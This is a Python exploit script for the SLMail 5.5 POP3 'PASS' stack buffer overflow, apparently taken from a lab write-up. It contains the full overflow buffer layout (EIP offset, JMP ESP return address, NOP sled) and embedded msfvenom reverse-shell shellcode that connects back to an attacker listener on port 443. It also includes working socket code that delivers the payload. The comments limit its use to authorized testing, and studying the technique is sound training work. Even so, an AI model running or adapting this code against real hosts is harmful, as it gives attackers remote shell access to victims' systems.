#!/usr/bin/python
import socket
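# SLMail 5.5 POP3 "PASS" stack buffer overflow -- classic lab exploit.
# Only run this against a host you are explicitly authorized to test; the
# payload below spawns a reverse shell and the service is expected to crash.
#
# Shellcode generated with:
#   msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.194 LPORT=443 \
#       -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
# Bad chars: \x00 ends a C string, \x0a/\x0d terminate a POP3 command line --
# any of them would truncate the PASS argument before the whole buffer lands.
# NOTE(review): the listener address/port (LHOST/LPORT) is baked into the
# encoded bytes; regenerate the payload for your own listener instead of
# editing the hex by hand, and start the listener before running this.

# Target SLMail POP3 service (Windows 7 lab machine in the original write-up).
TARGET_HOST = '192.168.1.59'
TARGET_PORT = 110
SOCKET_TIMEOUT = 10  # seconds; a crashed or hung service must not block forever

# Distance from the start of the PASS argument to the saved return address
# (found with pattern_create/pattern_offset). Re-verify on any other build.
EIP_OFFSET = 2606

# Return address overwrite: 0x5F4A358F in little-endian byte order, a JMP ESP
# gadget. The address is specific to the module/version of the original lab
# target -- presumably a non-rebased module -- re-find it (e.g. with mona)
# if the target differs, and confirm none of its bytes is a bad char.
JMP_ESP = b"\x8f\x35\x4a\x5f"

# Short NOP sled placed at ESP before the shellcode. The shikata_ga_nai
# decoder stub commonly writes to the stack just below/around ESP while
# locating itself; the sled keeps those writes from clobbering the decoder.
NOP_SLED = b"\x90" * 16

BAD_CHARS = b"\x00\x0a\x0d"

# Encoded reverse-shell payload (351 bytes) as emitted by msfvenom above.
SHELLCODE = (
    b"\xdb\xdf\xd9\x74\x24\xf4\x5e\x33\xc9\xb1\x52\xbf\x26\x1a\xb3"
    b"\x6d\x83\xc6\x04\x31\x7e\x13\x03\x58\x09\x51\x98\x58\xc5\x17"
    b"\x63\xa0\x16\x78\xed\x45\x27\xb8\x89\x0e\x18\x08\xd9\x42\x95"
    b"\xe3\x8f\x76\x2e\x81\x07\x79\x87\x2c\x7e\xb4\x18\x1c\x42\xd7"
    b"\x9a\x5f\x97\x37\xa2\xaf\xea\x36\xe3\xd2\x07\x6a\xbc\x99\xba"
    b"\x9a\xc9\xd4\x06\x11\x81\xf9\x0e\xc6\x52\xfb\x3f\x59\xe8\xa2"
    b"\x9f\x58\x3d\xdf\xa9\x42\x22\xda\x60\xf9\x90\x90\x72\x2b\xe9"
    b"\x59\xd8\x12\xc5\xab\x20\x53\xe2\x53\x57\xad\x10\xe9\x60\x6a"
    b"\x6a\x35\xe4\x68\xcc\xbe\x5e\x54\xec\x13\x38\x1f\xe2\xd8\x4e"
    b"\x47\xe7\xdf\x83\xfc\x13\x6b\x22\xd2\x95\x2f\x01\xf6\xfe\xf4"
    b"\x28\xaf\x5a\x5a\x54\xaf\x04\x03\xf0\xa4\xa9\x50\x89\xe7\xa5"
    b"\x95\xa0\x17\x36\xb2\xb3\x64\x04\x1d\x68\xe2\x24\xd6\xb6\xf5"
    b"\x4b\xcd\x0f\x69\xb2\xee\x6f\xa0\x71\xba\x3f\xda\x50\xc3\xab"
    b"\x1a\x5c\x16\x7b\x4a\xf2\xc9\x3c\x3a\xb2\xb9\xd4\x50\x3d\xe5"
    b"\xc5\x5b\x97\x8e\x6c\xa6\x70\x71\xd8\xa9\x42\x19\x1b\xa9\x43"
    b"\x61\x92\x4f\x29\x85\xf3\xd8\xc6\x3c\x5e\x92\x77\xc0\x74\xdf"
    b"\xb8\x4a\x7b\x20\x76\xbb\xf6\x32\xef\x4b\x4d\x68\xa6\x54\x7b"
    b"\x04\x24\xc6\xe0\xd4\x23\xfb\xbe\x83\x64\xcd\xb6\x41\x99\x74"
    b"\x61\x77\x60\xe0\x4a\x33\xbf\xd1\x55\xba\x32\x6d\x72\xac\x8a"
    b"\x6e\x3e\x98\x42\x39\xe8\x76\x25\x93\x5a\x20\xff\x48\x35\xa4"
    b"\x86\xa2\x86\xb2\x86\xee\x70\x5a\x36\x47\xc5\x65\xf7\x0f\xc1"
    b"\x1e\xe5\xaf\x2e\xf5\xad\xc0\x64\x57\x87\x48\x21\x02\x95\x14"
    b"\xd2\xf9\xda\x20\x51\x0b\xa3\xd6\x49\x7e\xa6\x93\xcd\x93\xda"
    b"\x8c\xbb\x93\x49\xac\xe9"
)


def build_exploit_buffer(offset=EIP_OFFSET, ret_addr=JMP_ESP,
                         nop_sled=NOP_SLED, shellcode=SHELLCODE):
    """Return the PASS argument: filler + return address + NOP sled + shellcode.

    Layout: `offset` bytes of 'A' reach the saved return address, `ret_addr`
    (4 bytes, little-endian) replaces it, `nop_sled` sits at ESP and
    `shellcode` follows. All arguments are bytes; defaults reproduce the
    original hard-coded exploit string.

    Raises ValueError if `ret_addr` is not exactly 4 bytes or if the finished
    buffer contains one of BAD_CHARS (which would truncate it on the wire).
    """
    if len(ret_addr) != 4:
        raise ValueError("ret_addr must be exactly 4 bytes, got %d" % len(ret_addr))
    payload = b"A" * offset + ret_addr + nop_sled + shellcode
    # Slice rather than iterate: iterating bytes yields ints on Python 3 and
    # 1-char strings on Python 2, slicing behaves the same on both.
    for i in range(len(BAD_CHARS)):
        bad = BAD_CHARS[i:i + 1]
        if bad in payload:
            raise ValueError("payload contains bad char %r" % bad)
    return payload


def send_exploit(host=TARGET_HOST, port=TARGET_PORT, payload=None,
                 timeout=SOCKET_TIMEOUT):
    """Connect to the POP3 service and deliver `payload` as the PASS argument.

    Drives the minimal POP3 exchange (banner, USER, PASS). No reply is read
    after PASS: on success the service runs the shellcode instead of
    answering. The socket is closed on every path and all socket errors
    (including timeouts) are reported rather than silently swallowed.

    Returns True when the whole exchange was sent, False on a socket error.
    """
    if payload is None:
        payload = build_exploit_buffer()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Without a timeout a dead/crashed service leaves recv() hanging forever.
    sock.settimeout(timeout)
    try:
        print("\nSending buffer...")
        sock.connect((host, port))
        sock.recv(1024)                      # POP3 greeting banner
        sock.sendall(b'USER username\r\n')   # any username is accepted pre-auth
        sock.recv(1024)                      # +OK for USER
        # sendall() rather than send(): the ~3 KB buffer must arrive whole.
        sock.sendall(b'PASS ' + payload + b'\r\n')
    except socket.error as exc:
        # socket.timeout is a socket.error subclass, so hangs end up here too.
        print("Exploit delivery failed: %s" % exc)
        return False
    finally:
        sock.close()
    print("\nDone.")
    return True


if __name__ == "__main__":
    send_exploit()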